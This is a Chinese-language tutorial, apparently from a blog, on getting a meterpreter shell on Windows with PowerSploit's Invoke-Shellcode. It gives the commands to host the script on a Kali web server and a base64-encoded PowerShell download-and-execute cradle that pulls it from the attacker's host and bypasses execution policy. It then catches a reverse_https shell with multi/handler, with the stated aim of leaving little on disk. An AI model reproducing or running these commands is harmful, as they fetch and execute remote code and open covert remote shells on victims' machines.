基本步骤:
环境:KaLi linux
kalilinux的PowerSploit的版本目前已过时了,所以我要运行:
wget -O /var/www/payload https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
接下来,我们需要添加相应的函数来调用LHOST和Lport的参数,并确保Apache正在运行echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> /var/www/payload
添加调用的函数:现在,我们有脚本代码托管,还需构建要执行的命令。虽然我们可以编码整个命令,但我发现,构建一个小型脚本会更加可靠。我们可以用同样的方法在一前一后使用。
基本上,我们是要将简短的Base64编码脚本块来把我们的脚本其余的部分拆除:
scriptblock="iex (New-Object Net.WebClient).DownloadString("http://$lhost/payload")" encode="`echo $scriptblock | base64 -w 0`"
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode" echo $command
接下来运行 multi/handler 与 reverse_https:
最后,我们运行的模块。用单一的命令来运行这个上传二进制服务的文件。这个命令是一个PowerShell脚本编码,这是拉低较大调用的shellcode脚本。调用ShellCode是确定是否是x86或x64,
注入meterpreter的shellcode到一个适当的环境中:
最终的结果是一个meterpreter shell,相比psexec_command模块,无需编写更多的磁盘。
我希望你觉得它对你有用,也许有人会得到启发,将这一切做成一个自动化模块
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论